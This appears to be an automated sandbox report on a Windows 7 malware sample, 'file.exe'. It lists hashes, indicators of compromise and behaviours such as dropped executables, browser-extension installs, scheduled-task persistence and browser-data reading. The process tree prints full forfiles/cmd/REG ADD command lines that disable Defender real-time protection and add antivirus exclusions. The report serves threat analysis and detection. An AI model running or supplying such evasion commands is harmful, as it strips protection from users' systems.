Analysis
-
max time kernel
130s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
26-12-2022 22:53
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
9ac5d9230be41bd9aa76591d79c1d1cf
-
SHA1
093ff68869288740d0ef4b1a77739a164b367658
-
SHA256
d394c46093850eeae163d901fec280ce9852fc94fff9505e149acba35e7a8cb4
-
SHA512
97363b67395a8fa5ea5d5a90b61d0849374bc09913d8771ed5c4cd32e3ad35aea804b14b8947b55da73be9e61d61ea1d000758dbd2e2c96d17033e38694d8bd9
-
SSDEEP
196608:91OhbIyho1wkS6zSV1m/drYfQWGsM7b2JF8Pw/:3OxIGAwxJ8Yf9GsMKJWw/
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QxhTRhBLgDrU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zopNtCPofqZRshxFhVR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\MIOQmlFchkRGycVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QxhTRhBLgDrU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\erSyCIiXgZXqUzOL = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TloWHzQxU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\MIOQmlFchkRGycVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\erSyCIiXgZXqUzOL = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eSoSRLDipKupC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eSoSRLDipKupC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wqPaCWxmyWUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wqPaCWxmyWUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\erSyCIiXgZXqUzOL = "0" schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\erSyCIiXgZXqUzOL = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TloWHzQxU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zopNtCPofqZRshxFhVR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1300 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1712 Install.exe 1448 Install.exe 1848 drUnsiw.exe 2044 PJTvDFK.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation PJTvDFK.exe -
Loads dropped DLL 12 IoCs
pid Process 2024 file.exe 1712 Install.exe 1712 Install.exe 1712 Install.exe 1712 Install.exe 1448 Install.exe 1448 Install.exe 1448 Install.exe 1300 rundll32.exe 1300 rundll32.exe 1300 rundll32.exe 1300 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json PJTvDFK.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 PJTvDFK.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 PJTvDFK.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol drUnsiw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D PJTvDFK.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PJTvDFK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol drUnsiw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini drUnsiw.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PJTvDFK.exe File created C:\Program Files (x86)\TloWHzQxU\kCfTIxI.xml PJTvDFK.exe File created C:\Program Files (x86)\QxhTRhBLgDrU2\mPDPrIb.xml PJTvDFK.exe File created C:\Program Files (x86)\zopNtCPofqZRshxFhVR\DAXjceI.dll PJTvDFK.exe File created C:\Program Files (x86)\eSoSRLDipKupC\ALtapUs.dll PJTvDFK.exe File created C:\Program Files (x86)\TloWHzQxU\lLCFcP.dll PJTvDFK.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi PJTvDFK.exe File created C:\Program Files (x86)\QxhTRhBLgDrU2\ElbLKCeFccsPk.dll PJTvDFK.exe File created C:\Program Files (x86)\zopNtCPofqZRshxFhVR\gdlpTIo.xml PJTvDFK.exe File created C:\Program Files (x86)\eSoSRLDipKupC\NUfmoRt.xml PJTvDFK.exe File created C:\Program Files (x86)\wqPaCWxmyWUn\MIfUzVW.dll PJTvDFK.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PJTvDFK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PJTvDFK.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bhiKLDYYmOVJYRnmNA.job schtasks.exe File created C:\Windows\Tasks\jAPQkthTMSklmsWLq.job schtasks.exe File created C:\Windows\Tasks\rSkSwYHQOxYzETV.job schtasks.exe File created C:\Windows\Tasks\lCFTjNOFEcSKwrIvx.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1964 schtasks.exe 1104 schtasks.exe 560 schtasks.exe 1100 schtasks.exe 1880 schtasks.exe 1336 schtasks.exe 684 schtasks.exe 1808 schtasks.exe 1120 schtasks.exe 1196 schtasks.exe 636 schtasks.exe 700 schtasks.exe 1808 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs PJTvDFK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-c8-e4-8b-4b-34 PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-c8-e4-8b-4b-34 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F27EC970-ABFE-4605-87CD-C18AF0CF5289} PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F27EC970-ABFE-4605-87CD-C18AF0CF5289}\WpadDecisionReason = "1" PJTvDFK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F27EC970-ABFE-4605-87CD-C18AF0CF5289}\WpadNetworkName = "Network 2" PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust PJTvDFK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-c8-e4-8b-4b-34\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F27EC970-ABFE-4605-87CD-C18AF0CF5289}\2a-c8-e4-8b-4b-34 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-c8-e4-8b-4b-34\WpadDetectedUrl rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-c8-e4-8b-4b-34\WpadDecision = "0" PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs PJTvDFK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F27EC970-ABFE-4605-87CD-C18AF0CF5289}\WpadDecision = "0" PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs PJTvDFK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F27EC970-ABFE-4605-87CD-C18AF0CF5289}\WpadDecisionTime = 400f987b8519d901 PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings PJTvDFK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\2a-c8-e4-8b-4b-34\WpadDecisionTime = 400f987b8519d901 PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs PJTvDFK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections PJTvDFK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 PJTvDFK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings PJTvDFK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates PJTvDFK.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1196 powershell.EXE 1196 powershell.EXE 1196 powershell.EXE 1392 powershell.EXE 1392 powershell.EXE 1392 powershell.EXE 824 powershell.EXE 824 powershell.EXE 824 powershell.EXE 828 powershell.EXE 828 powershell.EXE 828 powershell.EXE 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe 2044 PJTvDFK.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1196 powershell.EXE Token: SeDebugPrivilege 1392 powershell.EXE Token: SeDebugPrivilege 824 powershell.EXE Token: SeDebugPrivilege 828 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 2024 wrote to memory of 1712 2024 file.exe 28 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1712 wrote to memory of 1448 1712 Install.exe 29 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 696 1448 Install.exe 31 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 1448 wrote to memory of 1380 1448 Install.exe 33 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 696 wrote to memory of 1300 696 forfiles.exe 35 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1380 wrote to memory of 992 1380 forfiles.exe 36 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 1300 wrote to memory of 1352 1300 cmd.exe 37 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 992 wrote to memory of 1460 992 cmd.exe 38 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 1300 wrote to memory of 972 1300 cmd.exe 39 PID 992 wrote to memory of 1804 992 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\7zS446.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zS9B2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1352
-
-
